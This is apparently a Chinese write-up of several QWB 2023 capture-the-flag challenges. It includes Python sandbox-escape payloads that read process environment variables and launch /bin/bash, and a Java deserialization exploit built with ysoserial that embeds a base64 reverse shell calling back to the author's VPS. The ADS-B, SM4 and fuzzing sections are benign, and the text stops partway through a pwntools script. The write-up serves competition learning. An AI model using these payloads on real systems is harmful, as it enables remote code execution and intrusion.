【Misc】

Pyjail ! It’s myFILTER !!!

nc連接后我們先來看看

┌──(root?penetration)-[/]
└─# nc 8.147.129.5 40072

  _____        _       _ _   _   _____ _   _                       ______ _____ _   _______ ______ _____    _ _
 |  __ \      (_)     (_) | | | |_   _| | ( )                     |  ____|_   _| | |__   __|  ____|  __ \  | | |
 | |__) |   _  _  __ _ _| | | |   | | | |_|/ ___   _ __ ___  _   _| |__    | | | |    | |  | |__  | |__) | | | |
 |  ___/ | | || |/ _` | | | | |   | | | __| / __| | '_ ` _ \| | | |  __|   | | | |    | |  |  __| |  _  /  | | |
 | |   | |_| || | (_| | | | |_|  _| |_| |_  \__ \ | | | | | | |_| | |     _| |_| |____| |  | |____| | \ \  |_|_|
 |_|    \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_|    |_____|______|_|  |______|_|  \_\ (_|_)
         __/ |/ |                                             __/ |
        |___/__/                                             |___/

Python Version:python3.10
Source Code:

import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    print("Player! It's already banned!")

pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback

vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback

del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")

blacklist_words = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr"
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]

def my_filter(input_code):
    for x in blacklist_words:
        if x in input_code:
            return False
    return True

while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
    input_code = eval(f"f'{input_code}'")
else:
    print("Player! Please obey the filter rules which I set!")

Can u input your code to escape >

? 分析一下：

import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    print("Player! It's already banned!")

pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback

vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback

del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")

blacklist_words = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr"
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]

def my_filter(input_code):
    for x in blacklist_words:
        if x in input_code:
            return False
    return True

while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
    input_code = eval(f"f'{input_code}'")
else:
    print("Player! Please obey the filter rules which I set!")

? 主要目的是創(chuàng)建一個安全的環(huán)境，讓用戶在其中執(zhí)行他們的代碼，同時防止他們執(zhí)行可能會破壞系統(tǒng)或獲取敏感信息的代碼。

• 首先導(dǎo)入了一些Python模塊，如code, os, subprocess和pty，然后定義了一個名為blacklist_fun_callback的函數(shù)，該函數(shù)只是打印一條消息，表示某個功能已被禁用。

• 然后，將一些可能被惡意利用的函數(shù)和方法（如os.system, os.popen, subprocess.Popen, subprocess.call等）替換為blacklist_fun_callback，如果用戶試圖使用這些函數(shù)，他們只會看到一條消息，而不會實際執(zhí)行任何操作。

• 接下來，刪除了所有引用的模塊和blacklist_fun_callback函數(shù)，以防止用戶直接訪問它們。

• 然后，提示用戶輸入他們想要執(zhí)行的代碼，并將其存儲在input_code變量中。

• 然后定義了一個名為blacklist_words的列表，其中包含一些可能被惡意利用的關(guān)鍵字。

• my_filter函數(shù)接受用戶輸入的代碼，并檢查它是否包含blacklist_words列表中的任何關(guān)鍵字。如果包含，函數(shù)返回False，否則返回True。

• 在一個while循環(huán)中執(zhí)行用戶的代碼，只要它滿足一些條件（如不包含{或}，是ASCII字符，不包含blacklist_words列表中的任何關(guān)鍵字，長度小于65等）。如果用戶的代碼不滿足這些條件，代碼將打印一條消息，提示用戶遵守過濾規(guī)則。

? 然后嘗試了好多方法，后來想著能不能直接讀取環(huán)境變量，因為我自己出題的時候就經(jīng)常忘記把環(huán)境變量flag=not flag。最后payload：

{print(open("/proc/1/environ").read())}

easyfuzz

┌──(root?penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes):

? 一開始我也沒明白什么意思，然后隨便輸了點(diǎn)東西

┌──(root?penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes):

? 大致明白了是要跟000000000相同的位數(shù)：

┌──(root?penetration)-[/]
└─# nc 120.24.69.11 12199
Enter a string (should be less than 10 bytes): 5641d
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 222222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): df2222222
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 111111111
Here is your code coverage: 110000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes):

? 發(fā)現(xiàn)規(guī)律是前面兩個可以是任意的字母或數(shù)字，后面就要一個個去試了

xxqwbGood

qwb{YouKnowHowToFuzz!}

諜影重重2.0

? 提供了一個attach.pcapng文件，根據(jù)題目內(nèi)容以及通過觀察數(shù)據(jù)包的話是ADS-B數(shù)據(jù)解析。

? 為了方便處理我們把它轉(zhuǎn)換成JSON格式

? 在ADS-B (Automatic Dependent Surveillance-Broadcast) 系統(tǒng)中，飛機(jī)廣播的信息被編碼為多種不同的消息類型，每種類型的消息都有一個特定的類型碼（Type Code）。這些類型碼用于區(qū)分消息中包含的數(shù)據(jù)類型，例如飛機(jī)的身份、位置、速度等。

? 根據(jù)ADS-B協(xié)議的規(guī)范來的。具體來說：

• 類型碼19通常用于表示地面速度信息。
• 類型碼20到22用于表示空中速度信息。

? 這些類型碼定義了消息中包含的數(shù)據(jù)字段，以及如何解析這些字段以獲取飛機(jī)的速度和航向等信息。

? 這些信息通?？梢栽贏DS-B協(xié)議的官方文檔或相關(guān)的航空通信標(biāo)準(zhǔn)文檔中找到。例如，ICAO（國際民用航空組織）的文檔就詳細(xì)描述了ADS-B消息的格式和內(nèi)容，包括不同類型碼的含義。

? 在處理ADS-B數(shù)據(jù)時，解析器會根據(jù)這些類型碼來解析消息內(nèi)容，并提取出相應(yīng)的飛機(jī)速度信息。因此，通過檢查類型碼來確定哪些消息包含了速度信息，并據(jù)此提取和分析數(shù)據(jù)。

import json
import pyModeS as pms
import hashlib

# 打開并讀取json文件
with open('attach.json', 'r', encoding='utf-8') as file:
    data = json.load(file)

# 初始化一個空列表來存儲信息
info = []

# 遍歷json數(shù)據(jù)中的每個數(shù)據(jù)包
for packet in data:
    # 檢查數(shù)據(jù)包是否包含'tcp'層
    if 'layers' in packet['_source'] and 'tcp' in packet['_source']['layers']:
        tcp_layer = packet['_source']['layers']['tcp']

        # 檢查'tcp'層是否包含有效載荷
        if 'tcp.payload' in tcp_layer:
            # 如果有，將其添加到info列表中
            tcp_payload = tcp_layer['tcp.payload'].replace(':','')
            info.append(tcp_payload)

# 初始化一個空列表來存儲飛機(jī)數(shù)據(jù)
planes_data = []

# 遍歷info列表中的每個元素
for i in info:
    # 提取出有效載荷中的消息部分
    msg = i[18:]
    # 檢查消息的類型碼是否在19到22之間（這些類型碼對應(yīng)的是飛機(jī)的速度信息）
    if pms.adsb.typecode(msg) >= 19 and pms.adsb.typecode(msg) <= 22:
        # 如果是，提取出飛機(jī)的ICAO代碼和速度信息
        icao = pms.adsb.icao(msg)
        velocity_info = pms.adsb.velocity(msg)
        speed, track, vertical_rate, _ = velocity_info

        # 將這些信息存儲在一個字典中，并將該字典添加到planes_data列表中
        plane_info = {
            "icao": icao, 
            "speed": speed, 
            "track": track, 
            "vertical_rate": vertical_rate
            }
        planes_data.append(plane_info)

# 找出速度最快的飛機(jī)
fastest_plane = max(planes_data, key=lambda x: x['speed'])

# 打印出該飛機(jī)的ICAO代碼的MD5哈希值
print("flag{"+hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest()+"}")

簽到

flag{welcome_to_qwb_2023}

Pyjail ! It’s myRevenge !!!

┌──(root?penetration)-[/]
└─# nc 8.147.133.154 29942

  _____        _       _ _   _   _____ _   _                       ______ _____ _   _______ ______ _____    _ _
 |  __ \      (_)     (_) | | | |_   _| | ( )                     |  ____|_   _| | |__   __|  ____|  __ \  | | |
 | |__) |   _  _  __ _ _| | | |   | | | |_|/ ___   _ __ ___  _   _| |__    | | | |    | |  | |__  | |__) | | | |
 |  ___/ | | || |/ _` | | | | |   | | | __| / __| | '_ ` _ \| | | |  __|   | | | |    | |  |  __| |  _  /  | | |
 | |   | |_| || | (_| | | | |_|  _| |_| |_  \__ \ | | | | | | |_| | |     _| |_| |____| |  | |____| | \ \  |_|_|
 |_|    \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_|    |_____|______|_|  |______|_|  \_\ (_|_)
         __/ |/ |                                             __/ |
        |___/__/                                             |___/

Python Version:python3.10
Source Code:

import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    print("Player! It's already banned!")

pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback

vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback

del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")

blacklist_words_var_name_fake_in_local_real_in_remote = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr"
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]

def my_filter(input_code):
    for x in blacklist_words_var_name_fake_in_local_real_in_remote:
        if x in input_code:
            return False
    return True

while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
    input_code = eval(f"f'{input_code}'")
else:
    print("Player! Please obey the filter rules which I set!")

Can u input your code to escape >

? 先來分析一下：

import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    print("Player! It's already banned!")

pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback

vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback

del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")

blacklist_words_var_name_fake_in_local_real_in_remote = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp",
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr"
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]

def my_filter(input_code):
    for x in blacklist_words_var_name_fake_in_local_real_in_remote:
        if x in input_code:
            return False
    return True

while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
    input_code = eval(f"f'{input_code}'")
else:
    print("Player! Please obey the filter rules which I set!")

? 大致可以是一個安全性過濾器，它的主要目的是防止用戶執(zhí)行一些可能會對系統(tǒng)造成危害的操作。這是通過在代碼中禁止一些可能會被惡意利用的函數(shù)和模塊來實現(xiàn)的。
? 首先，定義了一個名為blacklist_fun_callback的函數(shù)，它會在被調(diào)用時打印一條消息。然后，將一些可能被惡意利用的函數(shù)和模塊，如os.system、subprocess.Popen等，都替換為這個函數(shù)。這樣，如果用戶試圖使用這些函數(shù)或模塊，就會失敗，而只會看到定義的消息。
? 接下來，定義了一個名為blacklist_words_var_name_fake_in_local_real_in_remote的列表，其中包含了一些可能會被惡意利用的關(guān)鍵詞。這些關(guān)鍵詞包括一些可能會被用來執(zhí)行惡意代碼的函數(shù)名、模塊名和路徑等。
? 然后，定義了一個名為my_filter的函數(shù)，它會檢查用戶輸入的代碼中是否包含這些關(guān)鍵詞。如果包含，函數(shù)將返回False，否則返回True。
? 最后，使用一個while循環(huán)來接收并處理用戶的輸入。只有當(dāng)用戶的輸入滿足所有的條件（不包含大括號，只包含ASCII字符，不包含黑名單中的關(guān)鍵詞，長度小于65，且不包含"eval"）時，輸入的代碼才會被執(zhí)行。否則，將打印一條消息提示用戶遵守過濾規(guī)則。

? 目標(biāo)很明確，就是繞過代碼中的安全過濾器，利用Python的動態(tài)特性和字符串格式化來繞過過濾器的限制以執(zhí)行任意代碼并最終獲取shell訪問。

? 首先可以清空blacklist_words_var_name_fake_in_local_real_in_remote列表，my_filter函數(shù)就不會再過濾任何輸入。假設(shè)黑名單被清空，那么此時就可以使用eval函數(shù)，為了保險起見要通過拼接字符串來獲取eval函數(shù)，繞過直接使用eval關(guān)鍵詞的限制。然后通過__import__函數(shù)導(dǎo)入os模塊繞過直接使用os關(guān)鍵詞的限制，使用os.execv函數(shù)執(zhí)行/bin/bash打開一個新的bash shell。最后payload：

{list(locals().values())[-2].clear()}'+'\"{'+'in'+'put()'+'}\"
{__builtins__.__dict__["ev"+"al"](input())}
{__builtins__.__dict__["__import__"]("os").execv("/bin/bash",["/bin/bash"])}

server_8F6C72124774022B.py

import code, os, subprocess
import pty

WELCOME = '''
  _____        _       _ _   _   _____ _   _                       ______ _____ _   _______ ______ _____    _ _ 
 |  __ \      (_)     (_) | | | |_   _| | ( )                     |  ____|_   _| | |__   __|  ____|  __ \  | | |
 | |__) |   _  _  __ _ _| | | |   | | | |_|/ ___   _ __ ___  _   _| |__    | | | |    | |  | |__  | |__) | | | |
 |  ___/ | | || |/ _` | | | | |   | | | __| / __| | '_ ` _ \| | | |  __|   | | | |    | |  |  __| |  _  /  | | |
 | |   | |_| || | (_| | | | |_|  _| |_| |_  \__ \ | | | | | | |_| | |     _| |_| |____| |  | |____| | \ \  |_|_|
 |_|    \__, || |\__,_|_|_| (_) |_____|\__| |___/ |_| |_| |_|\__, |_|    |_____|______|_|  |______|_|  \_\ (_|_)
         __/ |/ |                                             __/ |                                             
        |___/__/                                             |___/                                              
'''

SOURCE_CODE = '''
import code, os, subprocess
import pty
def blacklist_fun_callback(*args):
    print("Player! It's already banned!")

pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback

vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback

del os, subprocess, code, pty, blacklist_fun_callback
input_code = input("Can u input your code to escape > ")

blacklist_words_var_name_fake_in_local_real_in_remote = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp", 
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr"
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]

def my_filter(input_code):
    for x in blacklist_words_var_name_fake_in_local_real_in_remote:
        if x in input_code:
            return False
    return True

while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
    input_code = eval(f"f'{input_code}'")
else:
    print("Player! Please obey the filter rules which I set!")
'''

def blacklist_fun_callback(*args):
    print("Player! It's already banned!")

pty.spawn = blacklist_fun_callback
os.system = blacklist_fun_callback
os.popen = blacklist_fun_callback
subprocess.Popen = blacklist_fun_callback
subprocess.call = blacklist_fun_callback
code.interact = blacklist_fun_callback
code.compile_command = blacklist_fun_callback

vars = blacklist_fun_callback
attr = blacklist_fun_callback
dir = blacklist_fun_callback
getattr = blacklist_fun_callback
exec = blacklist_fun_callback
__import__ = blacklist_fun_callback
compile = blacklist_fun_callback
breakpoint = blacklist_fun_callback

del os, subprocess, code, pty, blacklist_fun_callback

print(WELCOME)
print("Python Version:python3.10")
print("Source Code:")
print(SOURCE_CODE)
input_code = input("Can u input your code to escape > ")

b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120 = [
    "subprocess",
    "os",
    "code",
    "interact",
    "pty",
    "pdb",
    "platform",
    "importlib",
    "timeit",
    "imp", 
    "commands",
    "popen",
    "load_module",
    "spawn",
    "system",
    "/bin/sh",
    "/bin/bash",
    "flag",
    "eval",
    "exec",
    "compile",
    "input",
    "vars",
    "attr",
    "dir",
    "getattr"
    "__import__",
    "__builtins__",
    "__getattribute__",
    "__class__",
    "__base__",
    "__subclasses__",
    "__getitem__",
    "__self__",
    "__globals__",
    "__init__",
    "__name__",
    "__dict__",
    "._module",
    "builtins",
    "breakpoint",
    "import",
]

def my_filter(input_code):
    for x in b1acklist_blacklist_blAcklist_blaCklist_b1acklisT_blackliSt_blAcklist_BlaCklist_blackList_words_516aedf48aa3c55c80799e24779be120:
        if x in input_code:
            return False
    return True

while '{' in input_code and '}' in input_code and input_code.isascii() and my_filter(input_code) and "eval" not in input_code and len(input_code) < 65:
    input_code = eval(f"f'{input_code}'")
else:
    print("Player! Please bypass my filter !")

問卷調(diào)查

flag{see_you_again_qwb_s8}

【Reverse】

ezre

? 一開始想隨便看看的，但是后來發(fā)現(xiàn)了什么

這不就是SM4加密

? 密鑰：

01 23 45 67 89 AB CD EF 01 23 45 67 89 AB CD EF

? 密文：

06 75 19 47 16 63 88 7C
8B 66 55 FF 3F 7D 0D 4A
F5 D2 4E 38 3F E9 C2 DE
DB 7C 7F 6F 74 B1 1F 3C

? 解密：

66 6c 61 67 7b 68 33 6b 6b 30 5f 77 30 72 6c 64 5f 73 75 72 33 5f 33 6e 30 75 67 68 7d 00 00 00

? 看到關(guān)鍵的666c就是fl的前綴了，十六進(jìn)制轉(zhuǎn)字符串：

flag{h3kk0_w0rld_sur3_3n0ugh}

【W(wǎng)eb】

happygame

? 這里要用到這個工具：https://github.com/Y4er/ysoserial，https://jitpack.io/com/github/Y4er/ysoserial/main-SNAPSHOT/ysoserial-main-SNAPSHOT.jar，還有grpcui.exe。然后順帶準(zhǔn)備一臺VPS（139.159.215.68）。

/bin/bash -i >& /dev/tcp/139.159.215.68/6767 0>&1
base64編碼：
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==

? 然后：

CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"

┌──(root?penetration)-[/]
└─# java -jar ysoserial-main-cff1edf282-1.jar CommonsCollections6 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEzOS4xNTkuMjE1LjY4LzY3NjcgMD4mMQ==}|{base64,-d}|{bash,-i}" | base64 | tr -d "\n"
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGliYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtSUM5a1pYWXZkR053THpFek9TNHhOVGt1TWpFMUxqWTRMelkzTmpjZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA==

? Terminal執(zhí)行：

grpcui.exe -plaintext 8.147.129.191:26804

? 選擇Raw Request，Request payload：

{"serializeData": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGliYXNoIC1jIHtlY2hvLEwySnBiaTlpWVhOb0lDMXBJRDRtSUM5a1pYWXZkR053THpFek9TNHhOVGt1TWpFMUxqWTRMelkzTmpjZ01ENG1NUT09fXx7YmFzZTY0LC1kfXx7YmFzaCwtaX10AARleGVjdXEAfgAbAAAAAXEAfgAgc3EAfgAPc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHh4eA=="}

? VPS上進(jìn)行監(jiān)聽：

root@ecs-74b2:~# nc -lvnp 6767
Listening on 0.0.0.0 6767

? 然后點(diǎn)擊Invoke

? 回到服務(wù)器上就可以正常反彈shell了：

【強(qiáng)網(wǎng)先鋒】

石頭剪刀布

? 從sklearn.naive_bayes中的MultinomialNB中看出是樸素貝葉斯分類器，用于訓(xùn)練模型。

from pwn import *

p=remote("8.147.131.39", 28434)

def Z():
    p.recv()
    p.sendline(b'0')
def O():
    p.recv()
    p.sendline(b'1')
def T():
    p.recv()
